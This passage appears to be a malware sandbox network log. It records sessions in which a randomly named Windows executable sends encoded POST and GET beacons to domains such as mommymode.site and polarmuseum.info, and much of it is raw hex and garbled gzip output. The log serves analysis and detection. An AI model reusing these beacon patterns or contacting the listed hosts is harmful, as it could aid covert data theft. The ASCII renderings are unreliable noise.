                                                                                                                  Data Ascii: r-zjv"mx$Hg/xb{gb(Z*)6GS_G(PTTe\:{/@3 xIxpg/R?o$KaqgJ rCLBh&\r&`&gPprKS4!`:r+W%RY\^M`ivJ~`7gLpyA4a(!Imr*M3V=&,h,4]d2fm7+7k|?suJ~FbmfK:$D}U&-h9{#ecEww7w{S4F^/;v.-{acJ@|s*4e3Jm~SyFDQMqP4Qp_/ho\]t~C~OP dU4(1MTtuN&V/;;Y<)~S|-oDDcUpj_7-B)Z8Q/Uofm73N&8-<dbyuZ.X]kh#'g#rgB,l
                                                                                                                  Oct 8, 2024 15:40:40.828493118 CEST224INData Raw: 08 4e b2 e0 d4 7e 2a 36 ad 53 0d 36 d7 92 58 0f 30 04 8b e6 da 57 94 af b5 ac 2e 61 32 99 e8 3f ed 5f 57 ad 6b 81 f3 95 c0 66 ce 9d fc 58 1d 60 a2 1a 91 60 71 c3 af 1a 1d 4c e3 7d 1e 1e 0f 02 fc 8d a2 c1 fb 3c 82 6e f4 3e ef 77 bb 21 fe 8e d9 51
                                                                                                                  Data Ascii: N~*6S6X0W.a2?_WkfX``qL}<n>w!QyY6QMs6}Ul6!N]G;mm2\(:::88uZXWllx7m\MUv=Z>cI#!D\Bx3TDKK)
                                                                                                                  Oct 8, 2024 15:40:40.828504086 CEST1236INData Raw: 57 5f 19 10 11 e1 d2 58 26 83 da 92 6f 5d 9e 7f 89 22 13 68 00 f9 5d 11 d4 e6 a0 db 6d f7 46 dd 96 cf 3d 3c 66 16 7e 10 90 82 b4 cd 46 99 e4 46 ab cd 26 da 05 ff 3b 25 2d 5c e2 45 3f 6c b4 97 73 2e c4 6f c0 c2 1f 35 fc 33 c7 7a b1 f0 df 74 af 5a
                                                                                                                  Data Ascii: W_X&o]"h]mF=<f~FF&;%-\E?ls.o53ztZm5i2EHz*ka1v]jV9,?0J&OkbpuN#;Egt0AA=M{,@%\MWRnP4w`-yg4fg#,FT'K^
                                                                                                                  Oct 8, 2024 15:40:40.828557968 CEST1236INData Raw: 7c 9a 22 1b 2e 7d af 8b f4 88 87 3b 90 2e e9 9e 16 5e 58 cd a4 89 10 c6 cf b3 0c 74 c0 0c 5c 4d 55 b8 f0 b4 15 e4 b3 b8 4a 25 a1 9a 54 64 c4 77 83 ae b2 1b 18 c5 c7 94 05 17 b1 56 b9 0c 97 0a bd c5 ee b9 9f f0 30 04 79 e5 6b a5 2c a9 fc df ae 6e
                                                                                                                  Data Ascii: |".};.^Xt\MUJ%TdwV0yk,n-3WMF}U(Z--UvW7"}Fwtj>^p!hGogtyFid,p\h"w\z:X=*x[>Lsk\n.OJt]T[swg=1
                                                                                                                  Oct 8, 2024 15:40:40.828569889 CEST1236INData Raw: a6 2f 30 85 bd ae 83 1b 4f 59 6f 6f e1 1a b8 7b d4 ee 8d f7 d5 f7 0b e0 11 3b 3e da 5b b8 02 3e 41 ec c1 68 b3 bc 8c 08 2d 5c a5 91 0a 72 e3 f7 b3 cb b2 a2 54 cf 2c 64 00 e1 4a 98 23 d6 ed 86 d1 ae fb 72 4e af df 6f 77 db fd fe a0 2a 73 7e 56 c5
                                                                                                                  Data Ascii: /0OYoo{;>[>Ah-\rT,dJ#rNow*s~V%rFDn~f[=o]^]yXNsk\6H S\ZW`4a`)B`Rt+J!V/ab84lA]>-g=],{QZg<JIN
                                                                                                                  Oct 8, 2024 15:40:40.828583002 CEST672INData Raw: 75 89 b6 c8 70 4a 51 0d ac 40 3b 34 a6 53 2f 7c b2 8e 06 75 52 80 dd ae 68 9d ee 83 32 80 0a 87 77 83 ad 6b 10 ee 0b fc b7 05 e1 16 bd a3 7b ca 0c d4 f0 b8 81 94 d5 f5 9b 8c 05 5c c6 94 0e bb 75 fd bb 16 b3 70 e9 9a d3 3a c8 08 d3 44 0d ff 04 94
                                                                                                                  Data Ascii: upJQ@;4S/|uRh2wk{\up:D^bR{r)T4mBxoI1t%mv0)vbm[5!mLUJ!P2q]cBY$<BM\.Z)9K5\L
                                                                                                                  Oct 8, 2024 15:40:40.828772068 CEST1236INData Raw: dd 6b 19 dc e1 a8 dd eb 56 87 9f 45 a5 1c 79 ad 86 86 70 df fc 8d 51 95 0e fd ee 51 7b 38 c6 ff f7 0d 9f 01 26 66 65 05 5b b8 b1 ab 34 70 93 14 67 77 9a d0 1f 1c b7 ab bf eb 0c 8c 4f 50 90 61 bb 77 32 da 37 3e 50 4a b8 99 73 a6 53 6a 32 08 ac ce
                                                                                                                  Data Ascii: kVEypQQ{8&fe[4pgwOPaw27>PJsSj2;q^wHSgJ0\!xuQ>^P&T/u&JaU;6U:_+Z:x6-2ZGqssq^Ie>_O@UL;,f
                                                                                                                  Oct 8, 2024 15:40:40.828783035 CEST1236INData Raw: 4f a9 84 98 59 3e 03 9a 28 cd 3f 29 69 99 a0 29 d3 31 97 3e c1 88 76 6f 4d e0 32 cb ed 8a 08 62 28 ed ef 76 bc b6 69 ce 43 9b f8 a4 bf 03 3a e5 92 26 c0 e3 c4 62 8d 37 42 e2 37 ab 0c 2e 26 80 66 ca 58 1a 01 b3 b9 06 ca 53 16 03 55 7a 06 5a b0 8c
                                                                                                                  Data Ascii: OY>(?)i)1>voM2b(viC:&b7B7.&fXSUzZ`s&E=mbPu+`edIJDcBMq,'-H}>]sD`Uv\ByS.Z8aj<0\rN<&x,DL$CqiGu%8n((>n@F-+Pf
                                                                                                                  Oct 8, 2024 15:40:40.828795910 CEST1236INData Raw: 87 3e 5b 8e ba d6 3b 27 7c b6 28 75 ad 35 13 a6 02 e7 df e6 bf 7d 70 c7 a0 02 a1 06 39 58 30 89 97 39 37 09 8d 35 ab 11 e9 33 86 6c 83 d5 cc 9b 27 dc c2 a3 86 14 08 35 c8 19 13 40 33 2e 1f a7 d3 1a a5 66 c2 8c cf 78 48 35 84 8f 9a b0 46 a9 99 20
                                                                                                                  Data Ascii: >[;'|(u5}p9X09753l'5@3.fxH5F KF)d8jOfS.8Y13vzDv$YyjnO3lk,xQ%P)3w5V3cs^,/1jkO73tvO0O1Do$
                                                                                                                  Oct 8, 2024 15:40:40.829006910 CEST1236INData Raw: 5b d8 4c 8a ab 98 f3 d0 0d 5f 81 ce 91 3d 9d 6b 96 39 c9 74 ca c4 56 fd d5 5e 15 fc 48 05 b9 a9 b4 60 c1 45 ac 55 2e 43 5a 59 f7 16 00 36 84 61 b9 55 db 8c 36 24 29 5c 2b ce aa ee e1 70 58 7c 87 dc b8 bc f9 a4 70 ae 38 2a c2 68 f8 27 c0 65 20 bd
                                                                                                                  Data Ascii: [L_=k9tV^H`EU.CZY6aU6$)\+pX|p8*h'e !RsTZX)a+I?aSFe0I!\"d+C"&IaNmFh&XHUtbL093F[xCBqH:fjPJQEn
                                                                                                                  Oct 8, 2024 15:40:40.835489988 CEST1236INData Raw: d7 84 5e 78 e7 57 34 7a 63 e7 67 b6 fb 1f b9 e4 56 ed b1 ba ff 42 6b 97 64 5e 70 d7 1a 8b 5f 78 d7 67 b6 f7 9d 12 73 b6 d8 63 ef e0 05 d6 35 05 11 3a eb 8d a8 60 96 4b 8a 43 bd b9 8a a2 fe c6 96 d5 f7 23 d7 19 be c6 3a 1a e2 5c 30 fd 4c 2b 8d 5e
                                                                                                                  Data Ascii: ^xW4zcgVBkd^p_xgsc5:`KC#:\0L+^c9t=:Ci|03/TPJ.v\-!OL_cv{ry!jDQ)L+:-]+x+W]t^/Uu|)3%N~#_}U=z/_}


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
43 | 192.168.2.5 | 50018 | 162.241.244.106 | 80 | 4568 | C:\Program Files (x86)\qMMscfYOaJVsvvwoxWKNjVjKgsZGdwzfiNkZOTOmcvHeNyaGgZTijVCYOWGYEWnlX\avmjQSNkeFbUoa.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 15:40:42.603425980 CEST | 1764 | OUT | POST /hya5/ HTTP/1.1
                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                  Accept-Language: en-US
                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                  Host: www.mommymode.site
                                                                                                                  Origin: http://www.mommymode.site
                                                                                                                  Connection: close
                                                                                                                  Cache-Control: max-age=0
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  Content-Length: 1239
                                                                                                                  Referer: http://www.mommymode.site/hya5/
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
                                                                                                                  Data Raw: 6e 56 3d 70 44 67 47 65 44 73 38 59 6c 37 6e 47 69 47 6a 64 37 63 52 49 5a 59 43 6b 65 64 36 45 79 30 76 43 58 38 45 30 71 37 32 50 58 48 4c 53 2b 71 73 65 76 63 72 31 5a 31 4f 70 70 75 6e 45 5a 61 57 2b 73 69 7a 43 65 4e 78 55 46 49 6f 58 51 52 32 39 51 50 63 56 33 69 66 4f 31 36 66 53 49 5a 59 51 64 69 33 70 63 57 77 78 74 56 6b 5a 68 47 31 30 75 34 71 7a 4d 55 65 77 52 62 42 39 34 4d 4a 45 38 57 50 50 61 49 7a 59 69 39 55 72 55 69 53 38 62 46 2b 51 47 69 59 79 66 79 75 74 72 31 30 67 4a 7a 41 4f 63 6a 72 72 37 5a 42 7a 76 70 48 63 44 69 41 59 77 30 48 6f 42 76 35 7a 70 71 58 57 4c 57 39 48 31 75 49 38 2f 75 54 53 4e 70 74 31 66 6e 46 4c 66 59 4b 76 35 62 65 39 57 55 66 42 4b 6d 46 45 58 51 72 72 75 6a 6e 69 33 2b 44 31 68 63 56 7a 59 2f 6c 56 45 37 44 66 47 68 51 66 48 5a 72 6b 76 78 7a 30 69 6b 36 35 6a 61 4f 36 6d 54 48 5a 5a 69 62 61 34 5a 7a 57 62 49 51 57 65 62 6b 75 44 38 72 65 6c 4f 69 41 2b 4b 41 61 54 53 5a 64 61 6f 4e 78 68 43 2b 7a 63 52 79 65 50 75 35 79 53 79 56 4f 75 71 53 7a 49 7a [TRUNCATED]
Data Ascii: nV= [TRUNCATED]
Oct 8, 2024 15:40:43.543582916 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                                                  Date: Tue, 08 Oct 2024 13:40:43 GMT
                                                                                                                  Server: Apache
                                                                                                                  Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                  Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                  Link: <https://mommymode.site/wp-json/>; rel="https://api.w.org/"
                                                                                                                  Upgrade: h2,h2c
                                                                                                                  Connection: Upgrade
                                                                                                                  Vary: Accept-Encoding
                                                                                                                  Content-Encoding: gzip
                                                                                                                  host-header: c2hhcmVkLmJsdWVob3N0LmNvbQ==
                                                                                                                  X-Newfold-Cache-Level: 2
                                                                                                                  X-Endurance-Cache-Level: 2
                                                                                                                  X-nginx-cache: WordPress
                                                                                                                  Content-Length: 12947
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Data Raw: 1f 8b 08 00 00 00 00 00 00 03 cd b2 eb 72 e3 c6 92 2d fc db 7a 8a 6a 76 d8 22 6d 16 78 a7 24 48 94 67 b6 2f e7 78 62 7b db e1 b6 67 62 c2 ed e8 28 02 09 a0 5a 85 2a ec aa 02 29 36 47 bf ce 53 9c 5f e7 15 bf 47 f8 b2 00 90 a2 28 50 54 eb ba db 16 01 54 65 ae 5c b9 d6 3a 7b f3 fd 2f df fd fe df bf fe 40 12 9b 8a f3 83 33 f7 20 82 c9 78 d2 00 49 ff 78 d7 70 67 c0 c2 f3 83 2f ce 52 b0 8c 04 09 d3 06 ec a4 f1 c7 ef 3f d2 e3 06 e9 ac 6f 24 4b 61 d2 98 71 98 67 4a db 06 09 94 b4 20 b1 72 ce 43 9b 4c 42 98 f1 00 68 f1 d1 26 5c 72 cb 99 a0 26 60 02 26 bd 02 67 03 e6 50 ab a9 b2 e6 70 0d 72 98 b2 4b ca 53 16 03 cd 34 b8 21 be 60 3a 86 c3 a2 d1 72 2b e0 fc 57 bc 25 52 59 12 a9 5c 86 e4 ab b7 c7 fd 5e ef 94 fc 4d 09 fc 60 69 76 4a 7e d5 60 ed 82 fc c2 0c 37 67 9d b2 eb e0 4c 70 79 41 34 88 c9 61 28 8d 83 8f c0 06 c9 21 49 f0 6d 72 d8 e9 a4 2a 4d 17 a9 0a c1 33 dc 56 13 d7 3d 0d 26 2c 68 c9 2c 34 88 5d 64 a8 00 cb 32 c1 03 66 b9 92 1d 6d cc 37 97 a9 c0 2b 37 6b d2 d8 c1 85 7c a5 d9 3f 73 75 4a 7e 04 08 1b e5 e0 [TRUNCATED]
                                                                                                                  Data Ascii: r-zjv"mx$Hg/xb{gb(Z*)6GS_G(PTTe\:{/@3 xIxpg/R?o$KaqgJ rCLBh&\r&`&gPprKS4!`:r+W%RY\^M`ivJ~`7gLpyA4a(!Imr*M3V=&,h,4]d2fm7+7k|?suJ~FbmfK:$D}U&-h9{#ecEww7w{S4F^/;v.-{acJ@|s*4e3Jm~SyFDQMqP4Qp_/ho\]t~C~OP dU4(1MTtuN&V/;;Y<)~S|-oDDcUpj_7-B)Z8Q/Uofm73N&8-<dbyuZ.X]kh#'g#rgB,l
                                                                                                                  Oct 8, 2024 15:40:43.543610096 CEST1236INData Raw: 08 4e b2 e0 d4 7e 2a 36 ad 53 0d 36 d7 92 58 0f 30 04 8b e6 da 57 94 af b5 ac 2e 61 32 99 e8 3f ed 5f 57 ad 6b 81 f3 95 c0 66 ce 9d fc 58 1d 60 a2 1a 91 60 71 c3 af 1a 1d 4c e3 7d 1e 1e 0f 02 fc 8d a2 c1 fb 3c 82 6e f4 3e ef 77 bb 21 fe 8e d9 51
                                                                                                                  Data Ascii: N~*6S6X0W.a2?_WkfX``qL}<n>w!QyY6QMs6}Ul6!N]G;mm2\(:::88uZXWllx7m\MUv=Z>cI#!D\Bx3TDKK)W_X&o]"
                                                                                                                  Oct 8, 2024 15:40:43.543629885 CEST1236INData Raw: 4d 55 08 7f 55 8e ac ee 30 94 96 07 4c 50 a1 ff 6a b5 6f e3 68 1e 27 9f 07 a4 85 03 ea 3f 11 a1 5b 38 0f 25 34 78 22 42 b7 70 1e 4a 68 f8 44 84 6e e1 3c 94 d0 e8 89 08 dd c2 79 28 a1 f1 13 11 ba 85 f3 30 42 4b ad 2c b3 e0 f7 8e bb 21 c4 57 07 67
                                                                                                                  Data Ascii: MUU0LPjoh'?[8%4x"BpJhDn<y(0BK,!WgxN\ik%K%jR&DAg)iF^{q.Uxe6ou!*|lTqm,k-e$BZ}m]~=-vMoo||".};.^X
                                                                                                                  Oct 8, 2024 15:40:43.543706894 CEST672INData Raw: c4 da cc ef 74 52 95 a6 8b 54 85 e0 e1 a6 d0 41 7e 28 80 c5 ac 77 8a 2d 4c 67 03 b6 c3 8c 01 6b 3a 88 d2 d9 31 c1 4b b9 f4 f0 fe db 19 e8 49 cf eb 7a dd 43 92 42 c8 d9 e4 90 09 71 48 3a db ba 41 aa 3e 72 5a ee 72 53 b2 83 2f 78 1a 3b c1 4c ca 05
                                                                                                                  Data Ascii: tRTA~(w-Lgk:1KIzCBqH:A>rZrS/x;L,}dy!7Ziem<"U$a^'eIy3M.Rc.}%kv)eq'O5,jRb!U5PBim{Li5:v?lB/0OYoo{
                                                                                                                  Oct 8, 2024 15:40:43.543725967 CEST1236INData Raw: d2 29 13 b5 75 33 a6 9b 94 ce 33 4a 33 0d 06 2c bd ae a2 55 5f c5 28 c9 63 f8 7c 08 d7 55 01 58 b8 b4 94 09 1e 4b 1a e0 fe a0 97 d7 27 7e 79 72 ab 50 40 64 37 cb dc f7 ad 22 ed d4 df ac 2a 0e ae de 82 0c 51 47 e4 c1 a6 02 28 84 dc 2a 4d 0d 04 96
                                                                                                                  Data Ascii: )u33J3,U_(c|UXK'~yrP@d7"*QG(*M+[RIU &lrqscy!,G.Lvjrz@q{@%a!*~4<5jeVqE3fK9~:M14rSf#~id
                                                                                                                  Oct 8, 2024 15:40:43.543745041 CEST1236INData Raw: 9e 4c 47 3d d8 b1 e3 94 99 7d ee 05 4a 5a cd 8c dd 93 9b 4c f3 94 69 17 97 7f 1f 8f 7e 18 1f d7 57 19 40 b8 b0 ac 83 68 30 38 ee d5 d7 59 d0 96 97 65 6c d8 ed 0e 77 88 98 00 0b 41 e3 16 c1 45 ac 55 2e 5d 72 7e f8 fe 87 de 0f 3b 60 ab fa 48 69 58
                                                                                                                  Data Ascii: LG=}JZLi~W@h08YelwAEU.]r~;`HiXTUo`\`tFf!ioZ^w4{Qq[S{vHKwF[~9Z8~tz|{yM5S>WxQ9kVEyp
                                                                                                                  Oct 8, 2024 15:40:43.543761015 CEST1236INData Raw: fe b8 9c d6 f7 86 c3 62 da e8 ae 51 c7 6b 9c a1 37 38 de c4 19 0f 4b 1c 7c 1b 17 38 e3 92 d1 4e a8 de 86 c3 c3 e1 a6 c3 83 f1 2d 87 c7 b5 02 24 2c 54 73 4a 25 b3 b9 66 c2 27 e3 ec b2 f8 3b c1 3f 1d 4f 59 b3 8b bd e5 ff 5e 7f 57 77 08 90 f9 a4 d7
                                                                                                                  Data Ascii: bQk78K|8N-$,TsJ%f';?OY^Wwg'r+f;0hsV7gvM47w[w*t@/k6_?akH/6z^5zqminttjd]e,]7t4P"OY>(?)i)1
                                                                                                                  Oct 8, 2024 15:40:43.543781042 CEST1236INData Raw: 27 c3 d5 b6 c8 1b 9e 66 4a 5b 26 6d 85 11 2c 98 c4 cb 9c 9b 84 c6 9a 2d ee 09 b7 dd 56 83 3c 4f 30 b3 f7 84 2b 6a 6b 30 32 26 80 66 a8 e9 3d 71 d6 f5 35 58 33 3e e3 21 d5 10 de 13 6b 5d 5f 83 25 f2 94 4b 95 af 40 95 66 32 be ef ae b5 bd fb 67 b0
                                                                                                                  Data Ascii: 'fJ[&m,-V<O0+jk02&f=q5X3>!k]_%K@f2gta#<N, KCSFnU+|?vk'nL|hR8eH!Pjf=QVu^h2eui]_eA[~UyR,*Vyo7v4<o7V<N>[;'|(u5
                                                                                                                  Oct 8, 2024 15:40:43.544075012 CEST1236INData Raw: c3 73 5d 74 df 44 3d f0 b5 52 96 f8 73 cc 20 34 3d 6c 9d 0a 15 5c d0 04 58 c8 65 dc 5a 06 4a 28 5d 87 5c 5c b8 4f 9e 32 bd 68 9d 3e 48 b7 53 0b 97 96 86 10 28 8d 99 52 d2 27 52 49 d8 4b 8b b0 ea c6 97 ca 16 d7 20 20 05 9c 30 cd ad 55 b2 d5 fa 0c
                                                                                                                  Data Ascii: s]tD=Rs 4=l\XeZJ(]\\O2h>HS(R'RIK 0U(u]8?8+5).aQz1_|<hI5Pd_LtOW xm_k}O3fp4G/xX`i755Idq)K([L_=k9
                                                                                                                  Oct 8, 2024 15:40:43.544112921 CEST1236INData Raw: c6 43 ec e2 cc b9 77 88 42 46 c8 c4 50 a1 02 26 0e cf 0f fe cd 7d d2 88 05 b0 ac de 52 2e 16 fe cf b9 e0 26 39 2d 8e 8a 6e 5f 2a 9d 32 51 9e cc 81 c7 89 f5 fb dd 2e 39 e9 76 cb b3 90 9b 4c b0 85 1f 21 c5 29 0b 2e 4e 31 97 3e c6 b9 79 b8 37 9b 36
                                                                                                                  Data Ascii: CwBFP&}R.&9-n_*2Q.9vL!).N1>y76LgmBJW,vJ2?l*G<0GaDmZak[- ?m9[B;Wl^r_zg*;Jm]iM^xW4zcgV
                                                                                                                  Oct 8, 2024 15:40:43.548846006 CEST1236INData Raw: a0 7f 2f 32 ee 34 c9 63 a0 eb e1 b7 f9 9d ff a2 54 66 da 24 63 31 10 a9 2c c6 2f 97 a1 b7 9e 91 dd 39 a2 71 fe 4e 69 bd 68 13 cc 86 8b 1a d1 f0 cf 1c 8c 45 7f 0a 40 6e 36 30 c9 7f ab 9c a4 ce 01 62 f5 82 30 62 80 e9 20 21 53 10 6a 8e 13 b3 62 e0
                                                                                                                  Data Ascii: /24cTf$c1,/9qNihE@n60b0b !Sjb)X9AR',bL%ftR"U!x.Ub7d]sL!-$ocEU@H7Us]qr)iw-BeDbs'G/QmE*hRn1i4


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
44 | 192.168.2.5 | 50019 | 162.241.244.106 | 80 | 4568 | C:\Program Files (x86)\qMMscfYOaJVsvvwoxWKNjVjKgsZGdwzfiNkZOTOmcvHeNyaGgZTijVCYOWGYEWnlX\avmjQSNkeFbUoa.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 15:40:45.147373915 CEST | 472 | OUT | GET /hya5/?ntHx=DVDDWR70P4Ux&nV=kBImd3s/QyLjHyq4SLIoEPo9gYVaCCo4aEwkxNbGH3XUM96sRoRP4M1J0fvTDuXIyYiaCoNXLmg3Qmdc8wSzXF+iMRPEX9kIPKmzrc+t3cVFLxWq6eg+2bNJjDDlhrBGZQ== HTTP/1.1
                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                  Accept-Language: en-US
                                                                                                                  Host: www.mommymode.site
                                                                                                                  Connection: close
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
                                                                                                                  Oct 8, 2024 15:40:45.911300898 CEST630INHTTP/1.1 301 Moved Permanently
                                                                                                                  Date: Tue, 08 Oct 2024 13:40:45 GMT
                                                                                                                  Server: nginx/1.25.5
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Content-Length: 0
                                                                                                                  Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                  Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                  X-Redirect-By: WordPress
                                                                                                                  Location: http://mommymode.site/hya5/?ntHx=DVDDWR70P4Ux&nV=kBImd3s/QyLjHyq4SLIoEPo9gYVaCCo4aEwkxNbGH3XUM96sRoRP4M1J0fvTDuXIyYiaCoNXLmg3Qmdc8wSzXF+iMRPEX9kIPKmzrc+t3cVFLxWq6eg+2bNJjDDlhrBGZQ==
                                                                                                                  host-header: c2hhcmVkLmJsdWVob3N0LmNvbQ==
                                                                                                                  X-Newfold-Cache-Level: 2
                                                                                                                  X-Endurance-Cache-Level: 2
                                                                                                                  X-nginx-cache: WordPress
                                                                                                                  X-Server-Cache: true
                                                                                                                  X-Proxy-Cache: MISS


Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
45         | 192.168.2.5 | 50020       | 199.59.243.227 | 80               | 4568 | C:\Program Files (x86)\qMMscfYOaJVsvvwoxWKNjVjKgsZGdwzfiNkZOTOmcvHeNyaGgZTijVCYOWGYEWnlX\avmjQSNkeFbUoa.exe

Timestamp                           | Bytes transferred | Direction | Data
Oct 8, 2024 15:40:56.054073095 CEST | 733               | OUT       | POST /nuqv/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US
Accept-Encoding: gzip, deflate
Host: www.polarmuseum.info
Origin: http://www.polarmuseum.info
Connection: close
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 203
Referer: http://www.polarmuseum.info/nuqv/
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
                                                                                                                  Data Raw: 6e 56 3d 52 6f 35 59 65 74 71 48 6c 6d 6b 38 42 4c 44 47 4f 2b 4d 77 69 43 2b 52 57 52 2b 6e 4b 54 54 77 6d 38 47 32 55 57 54 71 47 72 43 56 4e 4a 41 6e 36 68 45 4a 66 4d 55 44 42 6d 2f 34 51 6a 35 36 31 43 68 79 64 6c 75 39 4d 64 36 7a 4a 53 4d 55 55 75 36 48 76 43 4c 66 4c 4f 33 39 73 43 6a 4a 30 52 52 5a 41 4a 30 72 46 41 31 55 70 2b 38 4f 65 77 64 55 6f 64 54 73 52 68 45 2f 54 65 76 65 76 6e 49 42 6f 72 44 49 78 76 6e 35 7a 2b 6b 52 46 7a 73 69 7a 32 4f 72 70 6c 56 75 47 33 6c 41 51 38 73 70 48 53 74 45 34 31 41 6e 78 6a 66 70 77 66 32 7a 77 74 50 34 68 51 78 55 73 43 41 63 42 4c 68 5a 56 6f 77 3d
                                                                                                                  Data Ascii: nV=Ro5YetqHlmk8BLDGO+MwiC+RWR+nKTTwm8G2UWTqGrCVNJAn6hEJfMUDBm/4Qj561Chydlu9Md6zJSMUUu6HvCLfLO39sCjJ0RRZAJ0rFA1Up+8OewdUodTsRhE/TevevnIBorDIxvn5z+kRFzsiz2OrplVuG3lAQ8spHStE41Anxjfpwf2zwtP4hQxUsCAcBLhZVow=
Oct 8, 2024 15:40:56.509367943 CEST | 1236              | IN        | HTTP/1.1 200 OK
date: Tue, 08 Oct 2024 13:40:56 GMT
content-type: text/html; charset=utf-8
content-length: 1130
x-request-id: 6f893170-4882-491c-8f86-aff529dbdc2a
cache-control: no-store, max-age=0
accept-ch: sec-ch-prefers-color-scheme
critical-ch: sec-ch-prefers-color-scheme
vary: sec-ch-prefers-color-scheme
x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_bwwSsOG/hTj7Z+Eakf3+Bt00ZJwan5TDSf5fy7MIYb1IWMhYqLtHMy5blwXa+1aZ9H1OKKTs5DWiKPWVk7obdA==
set-cookie: parking_session=6f893170-4882-491c-8f86-aff529dbdc2a; expires=Tue, 08 Oct 2024 13:55:56 GMT; path=/
connection: close
                                                                                                                  Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 62 77 77 53 73 4f 47 2f 68 54 6a 37 5a 2b 45 61 6b 66 33 2b 42 74 30 30 5a 4a 77 61 6e 35 54 44 53 66 35 66 79 37 4d 49 59 62 31 49 57 4d 68 59 71 4c 74 48 4d 79 35 62 6c 77 58 61 2b 31 61 5a 39 48 31 4f 4b 4b 54 73 35 44 57 69 4b 50 57 56 6b 37 6f 62 64 41 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                                                                  Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_bwwSsOG/hTj7Z+Eakf3+Bt00ZJwan5TDSf5fy7MIYb1IWMhYqLtHMy5blwXa+1aZ9H1OKKTs5DWiKPWVk7obdA==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
Oct 8, 2024 15:40:56.509607077 CEST | 583 | IN | Data Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                                                                                  Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiNmY4OTMxNzAtNDg4Mi00OTFjLThmODYtYWZmNTI5ZGJkYzJhIiwicGFnZV90aW1lIjoxNzI4Mzk0OD


Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
46         | 192.168.2.5 | 50021       | 199.59.243.227 | 80               | 4568 | C:\Program Files (x86)\qMMscfYOaJVsvvwoxWKNjVjKgsZGdwzfiNkZOTOmcvHeNyaGgZTijVCYOWGYEWnlX\avmjQSNkeFbUoa.exe

Timestamp                           | Bytes transferred | Direction | Data
Oct 8, 2024 15:40:58.623476028 CEST | 753               | OUT       | POST /nuqv/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US
Accept-Encoding: gzip, deflate
Host: www.polarmuseum.info
Origin: http://www.polarmuseum.info
Connection: close
Cache-Control: max-age=0
